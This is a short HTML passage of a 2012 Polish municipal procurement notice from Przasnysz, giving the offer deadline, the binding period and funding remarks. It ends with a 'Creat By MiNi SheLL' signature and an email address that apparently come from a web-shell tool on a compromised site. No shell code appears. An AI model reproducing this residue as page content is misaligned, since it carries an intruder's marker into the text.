<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 12:00, miejsce: Urząd Miasta Przasnysz (biuro Obsługi Interesanta) 
 ul. J. Kilińskiego 2 , 06-300 Przasnysz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt nie jest finansowany ze środków Unii Europejskiej 
2. Zamawiający nie przewiduje się zwrotu kosztów udziału w postępowaniu z zastrzeżeniem art. 93 ust. 4.ustawy pzp.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com